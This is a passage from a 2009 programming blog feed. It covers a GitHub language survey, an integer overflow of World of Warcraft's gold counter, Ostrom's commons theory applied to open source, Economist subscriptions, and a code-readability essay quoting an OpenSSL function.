We've also achieved the goal we set out with - the clustering properties of the
2d Hilbert curve are directly visible as patches of similar colour.</p>
<p>By the way - if Hilbert curves float your boat, you may also be interested in a
previous post of mine, in which I <a href="https://corte.si/posts/code/hilbert/explorer/">visualise an IP geolocation database with
Hilbert curves</a>.</p>
<h2 id="the-code">The code</h2>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">git</span><span style="color:#c0c5ce;"> clone git://github.com/cortesi/scurve.git
</span></code></pre>
<p>I've released the code used to render the images in this article as a Python
project called <a href="http://github.com/cortesi/scurve">scurve</a> (for space-filling
curve). This project aims to be collection of clear implementations of
algorithms related to space filling curves, together with a set of tools for
visualising them. If you're interested in this kind of thing keep an eye on the
project - I plan to add more interesting goodies in the next few weeks.</p>
The impact of language choice on github projects
2009-12-15T00:00:00+00:00
2009-12-15T00:00:00+00:00
https://corte.si/posts/code/devsurvey/
<p>Although I spend a lot of my play-time fooling about with other languages, my
professional and released code consists of Python, C, C++ and, alas, Javascript.
I've lived in this tiny corner of the magic garden of modern software
development for 10 years, and I'm itching to strike out in a different direction
for my next project. With this in mind, I've started to wonder about the impact
of language choice on the development process. Are there major differences
between projects in different languages? Is it possible to quantify these
differences? I decided to try to gather some hard numbers. I started by writing
a small script to watch the <a href="http://github.com/timeline">public timeline</a> on
<a href="http://www.github.com">github</a>. Over a period of weeks, I collected a list of
about 30 thousand active projects. Using the github API, I eliminated projects
with less than 3 watchers, on the basis that these are likely to be small
personal repositories like dotfiles, programming exercises and so forth. After
this, I was left with some 5000 repositories, which I checked out, giving me
about 55G of data to work with. The next step was to analyse the data,
extracting commits, committers and line counts for each file type contained in
each project. Lastly, I got rid of duplicate projects by looking for matching
commit hashes. From start to end, this process took more than a week to
complete. The end result result is a database consisting of 3 400 repositories,
20 000 authors, and 1.5 million commits. I'm releasing the dataset for others to
play with - see the bottom of this post for information.</p>
<p>The rest of this post takes a basic look at the numbers for 12 languages. I had
to leave some out for lack of data. Haskell, for example, didn't make the cut
with only 18 projects. Ah, well.</p>
<p>Lets look at the numbers.</p>
<h2 id="the-basics">The Basics</h2>
<p>Lets start with a quick overview of the basics of the dataset.</p>
<div class="media">
<a href="samplesize.png">
<img src="samplesize.png" />
</a>
<div class="subtitle">
Sample size
</div>
</div>
<p>First, the sample size. Clearly, github is very popular with the Ruby crowd,
with more than four times as many projects as Python, the runner-up. The sample
sizes for C#, Erlang and Scala are pretty small, so the results for these
languages aren't as firm as for the others.</p>
<div class="media">
<a href="median_contributors.png">
<img src="median_contributors.png" />
</a>
<div class="subtitle">
Median contributors
</div>
</div>
<p>This graph shows the median number of contributors to projects in each language.
The red line here and in the graphs below is the median for all projects in the
dataset. <strong>Most projects have around 3 contributors, with Perl and Java projects
having about 5, and Javascript and Objective C around 2</strong>.</p>
<div class="media">
<a href="median_commits.png">
<img src="median_commits.png" />
</a>
<div class="subtitle">
Median commits
</div>
</div>
<p>Here we see the median number of commits for projects in each language - in some
senses, we can view this as a proxy for project age. <strong>Most projects have around
75 commits.</strong> The Perl and C++ data, however, seems significant - projects in
these languages on average have a much longer commit history. I suspect that
this is due to a decline in popularity in these languages. Recall that I
collected data only for projects that had recent commits. If fewer new projects
are created in C++ and Perl, we would expect projects in these languages to be
older, on average.</p>
<div class="media">
<a href="median_commitsize.png">
<img src="median_commitsize.png" />
</a>
<div class="subtitle">
Median commit size
</div>
</div>
<p>This chart shows the median commit size, in lines of code. We take the total
commit size to be the sum of lines inserted and the lines deleted, as reported
by "git log --shortstat". <strong>Most commits touch around 19 lines of code</strong>. The
C# outlier is probably due to the small sample set. I suspect that the
differences in this graph are a reflection of basic language verbosity, with
Objective C, C++ and Java being more verbose, and Perl, Python and Ruby being
less so.</p>
<div class="media">
<a href="median_commit_files.png">
<img src="median_commit_files.png" />
</a>
<div class="subtitle">
median files touched per commit
</div>
</div>
<p><strong>Most commits touch about 4 files, with C++ touching somewhat more, and Perl,
Python and Ruby somewhat less.</strong> The C# outlier is probably due to small sample
size.</p>
<h2 id="the-contributors">The Contributors</h2>
<div class="media">
<a href="median_commits_per_contributor.png">
<img src="median_commits_per_contributor.png" />
</a>
<div class="subtitle">
Median commits per contributor
</div>
</div>
<p>This shows the median number of commits contributors make. <strong> The average
contributor contributes about 5 commits to a project. C, Objective C and Ruby
developers contribute somewhat less, PHP, C#, Java and Javascript developers
somewhat more.</strong> I suspect the results for C and Ruby are due to
projects in these languages receiving more one-off contributions.</p>
<p>An average of only 5 commits - that's not much. Lets look at this from a
different perspective - graphing the percentage of the total commits to a
project made by contributors.</p>
<div class="media">
<a href="author_commit_quantile.png">
<img src="author_commit_quantile.png" />
</a>
<div class="subtitle">
% commits vs % contributors
</div>
</div>
<p>The percentage of commits by contributors is shown on the Y axis, and the
matching f-value on the X axis. An f-value of 25 is the bottom
<a href="http://en.wikipedia.org/wiki/Quartile">quartile</a>, 50 is the median, and 75 is
the upper quartile. Looking at the Python graph, for example, we can see that
the bottom 75% of contributors provided a bit less than 20% of the commits. The
shape of these graphs gives us our first take-away: <strong>For all languages, a small
fraction of the committers do the vast majority of the work.</strong> This won't be
news to anyone in the Open Source community. More interesting, though, is the
fact that <strong>C, C++ and Perl projects are significantly more "top-heavy" than
those in other languages, with a smaller core of contributors doing more of the
work.</strong></p>
<h2 id="how-projects-evolve">How projects evolve</h2>
<div class="media">
<a href="contributorsXcommits.png">
<img src="contributorsXcommits.png" />
</a>
<div class="subtitle">
Contributors vs Commits
</div>
</div>
<p>This dot plot shows the total number of contributors vs the total number of
commits for each project. I've restricted the X and Y values - we're effectively
looking at the bottom-left corner of a larger dataset. The red line is a
<a href="http://en.wikipedia.org/wiki/Local_regression">loess</a> fitted curve. Over a
large number of projects, we can consider the number of commits to be a measure
of time - the graph effectively shows how quickly projects tend to accumulate
contributors over their lifespan. <strong>Ruby projects recruit contributors
astoundingly well, with Python a close second. Java, Javascript and PHP
projects, on the other hand, do particularly badly.</strong> The fact that the fitted
curve is a nice straight line with a consistent slope shows that these results
hold for young and old projects alike. Note that the Scala data is not
significant - that nice straight line is an extrapolation by the curve fitting
algorithm, which is not backed up by information.</p>
<div class="media">
<a href="commit_age.png">
<img src="commit_age.png" />
</a>
<div class="subtitle">
Commit age
</div>
</div>
<p>This graph shows the number of commits per day, over the first 300 days of a
project's life. To prevent skew, I only included projects that are 300 days or
older. The red line is a smoothed curve. <strong>C and Perl projects show a marked
decline in activity over their first year.</strong> I suspect that the Perl result is
due to the fact that it becomes harder and harder to contribute to a Perl
codebase, the bigger it gets. The C result is more of a mystery.</p>
<h2 id="the-silly">The Silly</h2>
<p>And now for something silly.</p>
<div class="media">
<a href="swearwords.png">
<img src="swearwords.png" />
</a>
<div class="subtitle">
Swearwords per 1000 commits
</div>
</div>
<p>This shows the number of swearwords used per 1000 commits. Objective C and Perl
programmers are the most foul-mouthed. Java coders are more restrained, possibly
because the language is more corporate, and they're afraid of having their pay
docked.</p>
<h2 id="the-caveats">The Caveats</h2>
<p>There are all sorts of reasons why you should take all of this with a grain of
salt. There are many factors that make github projects atypical - not least of
which is the use of Git for source control. The way that I collected data skews
the dataset in favor of projects with recent commits - unfortunately dead
projects aren't included. I detected a project's primary language purely based
on line count by file extension. Due to the large number of projects that
include Javascript libraries in their repos wholesale, I had to apply a
fudge-factor weighting to .js files to get reasonably sensible results.</p>
<h2 id="you-can-play-too">You can play too</h2>
<p>I had fun playing with this dataset, and I've barely scratched the surface of
what could be done with it. I'll probably squeeze another blog post or two out
of the data, but in the meantime, I'm making the full database available so
people can point out the many mistakes and shortcomings of my analysis. At the
time of writing, I still have the checked out repositories, so if you have
suggestions for refinements or expansions to the data, let me know.</p>
<p>You can check the database out <a href="http://github.com/cortesi/devsurvey">here</a>. Be
warned, though - it's about 100mb of data.</p>
Overflowing World of Warcraft's gold counter
2009-12-11T00:00:00+00:00
2009-12-11T00:00:00+00:00
https://corte.si/posts/wow/beating-the-bank/
<div class="media">
<a href="overflow.jpg">
<img src="overflow.jpg" />
</a>
<div class="subtitle">
Bank Overflow
</div>
</div>
<p>It's a little known fact, but my only vice... Well, one of my <em>few</em> vices...
Cough. <em>Amongst my vices</em> is the fact that I play <a href="http://www.worldofwarcraft.com/">World of
Wacraft</a> with a small group of real-life
friends. As WoW habits go, mine is a very mild one - I don't often have time to
play more than one night a week. On the one night I do have, I want to raid,
not grind for gold to service endless repair bills. Irked by my situation, I
did what any red-blooded programmer would do. I wrote some code to collect
information on auction house price movements, analysed my data, and implemented
a Secret Trading Strategy in the form of a Super Secret Addon (which operates,
of course, entirely within WoW's terms of service). This has been successful
beyond the wildest dreams of avarice - I spend about 5 minutes a day buying and
selling the auctions recommended by the SSA, and I make enough to bankroll my
entire guild.</p>
<p>In fact, I just noticed that I have managed to overflow the "Total gold
acquired" counter in my stats tab. Turns out that WoW stores this figure as a
32-bit signed integer, expressed in copper. WoW now thinks I've earned
-1981224360 copper in total, something that can be achieved by earing more than
230 000 gold.</p>
Elinor Ostrom, the commons problem and Open Source
2009-12-10T00:00:00+00:00
2009-12-10T00:00:00+00:00
https://corte.si/posts/opensource/ostrom/
<div class="media">
<a href="bigstump.jpg">
<img src="bigstump.jpg" />
</a>
<div class="subtitle">
Logging in Tasmania
</div>
</div>
<p>In 1968, <a href="http://en.wikipedia.org/wiki/Garrett_Hardin">Garrett Hardin</a> coined
the term <a href="http://www.sciencemag.org/cgi/content/full/162/3859/1243">"Tragedy of the
Commons"</a> to describe
the economic mechanism that drives humans to destroy common resources. The
tragedy applies whenever a common resource is "subtractable" - that is, if use
of a resource subtracts from it, making what's been extracted unavailable to
others. While the full benefit of appropriating the resource goes to the user,
the cost is shared among everyone. The consequence is that for a self-interested
user of the resource, the benefits of increasing use will always outweigh the
costs, even if the resource is ultimately destroyed in the process. Central to
this is the problem of freeloaders - even if the vast majority of users use a
resource sustainably, a small number of opportunistic freeloaders can quickly
soak up the common benefit. The conventional economic view - first expressed by
Hardin himself - is that there are two ways to solve the commons problem:
privatising the resource so an owner with a direct interest can govern its use,
or imposing regulation from "outside" the system. It's interesting to see, then,
that this year's Nobel Prize in Economics went to <a href="http://en.wikipedia.org/wiki/Elinor_Ostrom">Elinor
Ostrom</a>, someone who has made a name
arguing against this fatalistic conclusion. Ostrom and her collaborators have
produced a huge literature studying commons that follow a third path -
consensual, self-generated governance that limits use to sustainable levels.</p>
<p>At the heart of Ostrom's work is a simple question - how does self-governance
arise? She approaches this problem with a simple equation describing the
cost-benefit analysis of an individual considering whether to participate in
communal governance. I've modified it slightly for this post - you can find the
original in the paper <a href="http://www.scielo.br/pdf/asoc/n10/16883.pdf">"Reformulating the
Commons"</a>:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">BN > BE + C
</span></code></pre>
<p><strong>BN</strong> is the benefit derived under a new (presumably communal) governance
strategy, <strong>BE</strong> is the benefit derived under the existing (presumably
non-communal) strategy, and <strong>C</strong> is the cost associated with switching. It's as
simple as that: the benefit of participating has to exceed the cost. In essence,
Ostrom's work on the commons explores the panoply of ways in which communities
encourage participation in commons governance by modifying this equation through
rewards, penalties and social norms. There's no single successful strategy, and
the ones that do work rely on concepts like trust, reciprocity, and the types of
institutional structures and individuals involved. Additional complexity comes
from the interactions between subsets of users - the equation can be different
for every user, and coalitions and factions are common. The huge diversity of
solutions means that Ostrom's work is dirtier and more empirical than much of
economics, and certainly far removed from the world of identical rational actors
in Hardin's original analysis.</p>
<p>It's interesting to consider how this line of thought applies to Open Source
projects. Software is not a classical <a href="http://en.wikipedia.org/wiki/Common_pool_resource">common pool
resource</a>, because it's not
subtractable - there's no cost to the users or developers of a project if I
choose to use it. Nonetheless, an Open Source project is definitely a commons,
in the sense that it is a community resource that thrives or starves depending
on contributions from its members. The participants in this type of commons is
the pool of potential contributors, rather than the pool of potential
appropriators. In the same way that using a common pool resource applies a
shared penalty to everyone, a contribution to the software commons benefits
everyone. This type of non-subtractive (additive?) commons has its own version
of the freeloader problem - it pays for a contributor to hang back and wait for
someone else to add a needed feature, rather than go to the expense of adding it
themselves. If the contributor is a company, it might be beneficial to maintain
a competitive advantage by not contributing a change back to the community, even
if the work has already been done. Open Source projects face an inverted form of
the commons problem, which can be expressed in a modified version of Ostrom's
commons equation:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">BC > BN + C
</span></code></pre>
<p>Here, <strong>BC</strong> is the benefit of contributing, which has to outweigh the cost of
contributing (<strong>C</strong>) plus the benefit of not contributing (<strong>BN</strong>). The Open
Source world has produced an immensely sophisticated set of norms and
institutions around the terms of this equation, resulting in some of the most
successful self-governance structures on the planet. I'd argue that most of the
institutional work in Open Source over the last few decades have focused on
reducing <strong>C</strong> - a lot of the basic technology and accompanying social norms
used in Open Source development (mailing lists, bug trackers, version control
systems, communications protocols) is lubrication to reduce the cost of
contributing. I think you could even make a plausible case that much of what
drives the Internet is just a side-effect of Open Source projects trying to
reduce <strong>C</strong>.</p>
<p>Another interesting train of thought is spurred by the factor <strong>BN</strong> - the
benefit of not contributing. This nicely illuminates the fundamental difference
between commercial and individual contributors - for individual contributors
without commercial interests, <strong>BN</strong> is almost always 0. For commercial
contributors, however, this term can be large. Consequently, we would expect
projects where commercial contribution is important to have measures that aim to
reduce <strong>BN</strong> - penalties that minimise the benefit of not contributing to the
project. The outstanding example here is the Linux kernel project, which has
followed a very successful two-fold path to reduce <strong>BN</strong>. The first, of course,
is licensing - the GPL imposes stiff penalties (paid in terms of public outcry
and possible legal consequences) on those failing to contribute code back to the
project under many circumstances. The terms of the GPL do not cover all types of
use, however, so there is a second tier of operational penalties for code that
is license compliant, but not contributed back to the project. To quote <a href="http://en.wikipedia.org/wiki/Greg_Kroah-Hartman">Greg
Kroah-Hartman</a> in a <a href="http://howsoftwareisbuilt.com/2009/11/18/interview-with-greg-kroah-hartman-linux-kernel-devmaintainer/">recent
interview</a>:</p>
<blockquote>
<p>Because of our huge rate of change, [drivers] pretty much have to be in the
kernel tree. Otherwise, keeping a driver outside the kernel is technically a
very difficult thing to do, because our internal kernel APIs change very,
very rapidly.</p>
</blockquote>
<p>It's interesting to consider whether this last penalty is intentional or not.
There are good technical reasons not to make any stability guarantees for
internal APIs, but at the same time I'm sure that many kernel hackers are very
aware of the fact that a rapidly-changing internal API compels companies to
contribute code. I don't think it's a coincidence that the most successful Open
Source project in the world has adopted strategies to penalize potential
contributors for not donating code to the community. Reducing <strong>BN</strong> is one of
the reasons why Linux has a vastly greater commercial contribution than, say,
FreeBSD, and is therefore a much more vibrant and active project.</p>
Why I subscribe to the Economist
2009-11-08T00:00:00+00:00
2009-11-08T00:00:00+00:00
https://corte.si/posts/media/why-i-subscribe-to-the-economist/
<div class="media">
<a href="economist.jpg">
<img src="economist.jpg" />
</a>
<div class="subtitle">
Economist
</div>
</div>
<div class="media">
<a href="guardian.jpg">
<img src="guardian.jpg" />
</a>
<div class="subtitle">
Guardian
</div>
</div>
<p>I've been a long-time reader of two international papers - the <a href="http://www.guardianweekly.co.uk/">Guardian
Weekly</a> and the
<a href="http://www.economist.com/">Economist</a>. Over the last year, these two papers
have had startlingly different performance results - the Guardian Media Group
posted a record <a href="http://www.pressgazette.co.uk/story.asp?storycode=44075">loss of $150
million</a> for the year
ending in June, while the Economist reported a record operating <a href="http://www.economistgroup.com/our_news/press_releases/2009/results_for_the_year_ended_march_31st_2009.html">profit of $92
million</a>
in the year ending in March. I have played my own tiny part in producing this
outcome. I used to buy both the Economist and the Guardian Weekly religiously
every week - today, I'm a paid-up subscriber to the Economist, and no longer buy
the Guardian at all. So, how did the Guardian lose my dime entirely, while The
Economist converted me from a news-stand purchaser to a subscriber? The answer
to the first part of the question is simple: I no longer buy the Guardian Weekly
because most of their content is available on the <a href="http://www.guardian.co.uk">Guardian
website</a> for free (even the crosswords, which I still
print out and do over breakfast). I just have no incentive to fork out money for
a piece of paper containing articles I've already read. The Economist has played
the game rather more cleverly. Editorial pieces that are likely to generate
inbound links are released for free on their website, but the bulk of their
factual reporting remained behind a paywall. This alone would not have been
enough to induce me to part with my hard-earned doubloons - if they stopped
there, I would probably just have switched to free (though probably lower
quality) alternatives. They really hooked me by offering a complete,
professionally read audio edition, delivered promptly through an RSS feed at the
same time as the print edition. This means that my subscription buys me about 8
hours of excellent audio content every week. By contrast, the rather quaint
perk I would receive if I subscribed to the Guardian Weekly is a "digital paper"
edition - essentially a series of large zoom-able images of the laid-out paper
that I can't cut and paste from, link to, or even read comfortably.</p>
<p>There's been a fair bit of head-scratching by pundits trying to explain The
Economist's unexpected success. Michael Hirschorn from the Atlantic <a href="http://www.theatlantic.com/doc/200907/news-magazines">just seems
terribly confused</a>,
claiming that the Economist "has never had much digital savvy", and concluding
inexplicably that it must all just be luck. <a href="http://www.niemanlab.org/2009/09/clay-shirky-let-a-thousand-flowers-bloom-to-replace-newspapers-dont-build-a-paywall-around-a-public-good/">Clay Shirkey
thinks</a>
that the Economist is a niche financial news publication, and that its audience
of "traders and business people" are willing to pay for specialist content when
other people are not. Both of these opinions are quite wrong. The Economist has
played a cunning strategic game with considerable <em>sang-froid</em>, and has shown
much more savvy in producing monetizable online material than the Guardian (or
indeed the Atlantic). Despite its name the Economist is in fact a
general-interest international newspaper, with much more space devoted to news
and politics than business and economics. The real answer is, I think, somewhat
simpler: the Economist didn't abandon the basic rules of business - exchanging
something of value for currency - when they moved online.</p>
<p>All of this reminds me of a recent blog post by <a href="http://blog.amandapalmer.net/post/200582690/why-i-am-not-afraid-to-take-your-money-by-amanda">Amanda
Palmer</a>,
lead singer for the Dresden Dolls. She's fairly well known for shamelessly
monetizing her fanbase, an attitude she says has roots in her past as a street
performer. She makes a convincing case that artists have historically been
insulated by record companies from actually having to ask their fans for money.
Putting your hat out and asking for coins is seen as grubby - an attitude that
is going to have to change as record companies exit stage left and the
connection between performers and audiences becomes more direct. A somewhat
analogous thing is now happening to many news publishers - the most obvious
alternative to selling eyeballs to advertisers is to put on a good show, and ask
your audience for money. In my case, that's exactly what the Economist did -
they offered me a distinctive benefit, and asked me to pay for it. And,
apparently like many other Economist subscribers, I was happy to.</p>
Reading Code: In praise of superficial beauty
2009-11-04T00:00:00+00:00
2009-11-04T00:00:00+00:00
https://corte.si/posts/code/reading-code/
<p>Every good programmer has gone through this. You discover a new tool, and it
seems shapely and fit for purpose. You start using it, tentatively at first,
gradually getting more and more used to its quirks and features. Over time,
trust between you grows, and your casual friendship blossoms into something
deeper. The program becomes part of that sacred subset of utilities you can't
imagine yourself without. All is bliss... Then, one day, you decide to look at
the code. Maybe you want to extend it, maybe you're just curious. The moment
you fire up your editor on the first source file, you sense that something is
wrong. Without reading a line, you notice a certain visual complexity to the
code - something to do with deeply nested and over-long functions. Looking
closer, you quickly realise that tangles of ifdefs snake through the source like
a canker. Weird indentation and non-idiomatic constructs are everywhere. The
project's structure sucks - there's no proper component isolation, its innards
are a nest of subtle and devious co-dependencies. Beneath the skin of the
streamlined program you thought you were using lies a grotesque, bloated,
unmaintainable monstrosity. You're heartbroken - you've trusted this tool for
years, and now it betrays you like this. It was all a lie - nothing will ever be
the same again...</p>
<p>I know from personal experience that this is a very traumatic process, so it's
with great sympathy that I read a recent article by Marco Peereboom - an
vocative and haunting lament with the poetic title <a href="http://www.peereboom.us/assl/html/openssl.html">"OpenSSL is written by
monkeys"</a>. Marco modestly
claims not to be a great programmer, but he <em>is</em> a contributor to OpenBSD, a
project that has a frankly
<a href="http://en.wikipedia.org/wiki/Theo_de_Raadt">psychotic</a> focus on code quality.
So, lets see what a graduate of the OpenBSD Academy of Programming makes of the
OpenSSL codebase, as illustrated by this illuminating extract:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">#ifndef</span><span style="color:#c0c5ce;"> OPENSSL_NO_STDIO
</span><span style="color:#65737e;">/*!
* Load CA certs from a file into a ::STACK. Note that it is somewhat misnamed;
* it doesn't really have anything to do with clients (except that a common use
* for a stack of CAs is to send it to the client). Actually, it doesn't have
* much to do with CAs, either, since it will load any old cert.
* \param file the file containing one or more certs.
* \return a ::STACK containing the certs.
*/
</span><span style="color:#bf616a;">STACK_OF</span><span style="color:#c0c5ce;">(X509_NAME) *</span><span style="color:#8fa1b3;">SSL_load_client_CA_file</span><span style="color:#c0c5ce;">(</span><span style="color:#b48ead;">const char </span><span style="color:#c0c5ce;">*</span><span style="color:#bf616a;">file</span><span style="color:#c0c5ce;">)
{
BIO *in;
X509 *x=</span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">;
X509_NAME *xn=</span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">;
</span><span style="color:#bf616a;">STACK_OF</span><span style="color:#c0c5ce;">(X509_NAME) *ret = </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">,*sk;
sk=</span><span style="color:#bf616a;">sk_X509_NAME_new</span><span style="color:#c0c5ce;">(xname_cmp);
in=</span><span style="color:#bf616a;">BIO_new</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">BIO_s_file_internal</span><span style="color:#c0c5ce;">());
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">((sk == </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">) || (in == </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">))
{
</span><span style="color:#bf616a;">SSLerr</span><span style="color:#c0c5ce;">(SSL_F_SSL_LOAD_CLIENT_CA_FILE,ERR_R_MALLOC_FAILURE);
</span><span style="color:#b48ead;">goto</span><span style="color:#c0c5ce;"> err;
}
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(!</span><span style="color:#bf616a;">BIO_read_filename</span><span style="color:#c0c5ce;">(in,file))
</span><span style="color:#b48ead;">goto</span><span style="color:#c0c5ce;"> err;
</span><span style="color:#b48ead;">for </span><span style="color:#c0c5ce;">(;;)
{
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">PEM_read_bio_X509</span><span style="color:#c0c5ce;">(in,&x,</span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">,</span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">) == </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">)
</span><span style="color:#b48ead;">break</span><span style="color:#c0c5ce;">;
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(ret == </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">)
{
ret = </span><span style="color:#bf616a;">sk_X509_NAME_new_null</span><span style="color:#c0c5ce;">();
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(ret == </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">)
{
</span><span style="color:#bf616a;">SSLerr</span><span style="color:#c0c5ce;">(SSL_F_SSL_LOAD_CLIENT_CA_FILE,ERR_R_MALLOC_FAILURE);
</span><span style="color:#b48ead;">goto</span><span style="color:#c0c5ce;"> err;
}
}
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">((xn=</span><span style="color:#bf616a;">X509_get_subject_name</span><span style="color:#c0c5ce;">(x)) == </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">) </span><span style="color:#b48ead;">goto</span><span style="color:#c0c5ce;"> err;
</span><span style="color:#65737e;">/* check for duplicates */</span><span style="color:#c0c5ce;">
xn=</span><span style="color:#bf616a;">X509_NAME_dup</span><span style="color:#c0c5ce;">(xn);
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(xn == </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">) </span><span style="color:#b48ead;">goto</span><span style="color:#c0c5ce;"> err;
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">sk_X509_NAME_find</span><span style="color:#c0c5ce;">(sk,xn) >= </span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">)
</span><span style="color:#bf616a;">X509_NAME_free</span><span style="color:#c0c5ce;">(xn);
</span><span style="color:#b48ead;">else
</span><span style="color:#c0c5ce;">{
</span><span style="color:#bf616a;">sk_X509_NAME_push</span><span style="color:#c0c5ce;">(sk,xn);
</span><span style="color:#bf616a;">sk_X509_NAME_push</span><span style="color:#c0c5ce;">(ret,xn);
}
}
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">)
{
err:
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(ret != </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">) </span><span style="color:#bf616a;">sk_X509_NAME_pop_free</span><span style="color:#c0c5ce;">(ret,X509_NAME_free);
ret=</span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">;
}
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(sk != </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">) </span><span style="color:#bf616a;">sk_X509_NAME_free</span><span style="color:#c0c5ce;">(sk);
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(in != </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">) </span><span style="color:#bf616a;">BIO_free</span><span style="color:#c0c5ce;">(in);
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(x != </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">) </span><span style="color:#bf616a;">X509_free</span><span style="color:#c0c5ce;">(x);
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(ret != </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">)
</span><span style="color:#bf616a;">ERR_clear_error</span><span style="color:#c0c5ce;">();
</span><span style="color:#b48ead;">return</span><span style="color:#c0c5ce;">(ret);
}
</span><span style="color:#b48ead;">#endif
</span></code></pre>
<p>His objections boil down to the following:</p>
<ul>
<li>The indentation style is weird, and in many circumstances hard to parse.</li>
<li>The project uses a mixture of CamelCase and underscore-based function naming.</li>
<li>The error cleanup strategy is bizarre - using a goto to jump into code
guarded by an "if(0)" is distinctly unlovely.</li>
<li>In this example, the function name mis-characterises what the function
actually does. The somewhat shame-faced comment doesn't fix the problem, it
just makes it funny.</li>
<li>The project suffers from ifdef-itis.</li>
<li>Most importantly, the code does not "read" well. In this case, we find
multiple levels of indirection, and no clear flow to the function.</li>
</ul>
<p>So, while Marco's problem <em>started</em> with the project's shoddy documentation and
API, his actual code criticism focuses on issues that are apparently
superficial. He hasn't discovered a substantive bug or architectural weakness in
the snippet above. Instead, what matters to him are simple virtues like
consistency, style, and readability. Marco is saying, in fact, that the OpenSSL
code sucks because it lacks superficial beauty. I couldn't agree with this
position more.</p>
<p>I'm reminded of a recent blog post describing "the perfect interview question"
for programmers: ask them what bothered them most when reviewing other people's
code. The blogger argued that a response focusing on superficial code quality
meant that the interviewee was obviously not an "architectural thinker", and was
therefore a poor candidate. This is utter tripe. Good programmers know that a
lack of superficial code quality and consistency is the <em>best</em> indicator of
deeper systemic problems in a project. If you ever need a quick estimate of the
quality of a codebase, this is what you should look at first. If you ever have
to work on a project with poor code quality, fix the superficial issues first.
Ugly code will obscure deeper architectural issues, increase defect rates, make
code review hell, and make the project hard to refactor. This is advice so basic
that it usually does not need to be given - good coders understand the
importance of superficial beauty at such a deep instinctive level that they will
feel <em>compelled</em> to fix cleanliness and neatness issues before working on deeper
problems.</p>
<p>Superficial beauty is not something that is discussed nearly enough in the Open
Source world, so I'm going to don my flame-retardant poncho, and name some
names. In keeping with this post's starting point, I'm going to focus on
projects in C. Lets start with the ugly. The codebase for
<a href="http://www.vim.org/">Vim</a>, a tool that I spend hours using every day, turns out
to be a frightening and inscrutable thicket of #ifdefs. The Linux kernel is
immensely variable in quality - some of it is very good, some of it - especially
less widely used drivers - is unspeakable. The <a href="http://www.mutt.org/">mutt</a>
codebase is pretty terrible, prominently featuring one of my pet bugaboos -
mixing tabs and spaces, invisibly screwing up indentation depending on your
editor configuration. The <a href="http://www.wireshark.org/">Wireshark</a> packet sniffer -
another project I use daily - is so bad that OpenBSD <a href="http://www.openbsd.org/cgi-bin/cvsweb/ports/net/ethereal/Attic/Makefile?hideattic=0">opted to
remove</a>
it from their ports tree rather than encourage their users to use it. Wireshark
wins a special prize for over-commenting. They've clearly abandoned all hope of
communicating their intentions through the code itself, degenerating instead to
things like this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#65737e;">/* Now bump the count. */
</span><span style="color:#c0c5ce;">(*argc)++;
</span></code></pre>
<p>I'll end the post on a high note, with some examples of great code quality.
OpenBSD is undoubtedly one of the pin-up projects of the Open Source world,
featuring code that is almost supernaturally clean, consistent and direct. If
you're interested in taking a look, I recommend starting with some of their
recent daemon development - their
<a href="http://www.openbsd.org/cgi-bin/cvsweb/src/usr.sbin/smtpd/?sortby=date#dirlist">SMTP</a>
and <a href="http://www.openbsd.org/cgi-bin/cvsweb/src/usr.sbin/ntpd/?sortby=date">NTP</a>
daemons are good candidates. Another excellent project to look at is the C
Python interpreter, which shares many of OpenBSD's virtues. Note that I mean the
interpreter itself - the the standard library is unexpectedly variable in
quality. A more obscure project with great code quality is the <a href="http://plan9.bell-labs.com/sources/plan9/sys/src/">Plan9 operating
system</a>. Sadly, Plan9 never
took off (perhaps because it wasn't free software from the beginning), but the
codebase illustrates many of the sound principles outlined in by Kernighan and
Pike - both of whom were involved in Plan9 - in <a
href="https://www.amazon.com/Practice-Programming-Addison-Wesley-Professional-Computing/dp/020161586X">The
Practice of Programming</a>.</p>
<p><strong>edit:</strong> Meanwhile, over on
<a href="http://www.reddit.com/r/programming/comments/a0s6o/in_praise_of_superficial_beauty_a_followup_to/">reddit</a>
dagbrown has pointed out
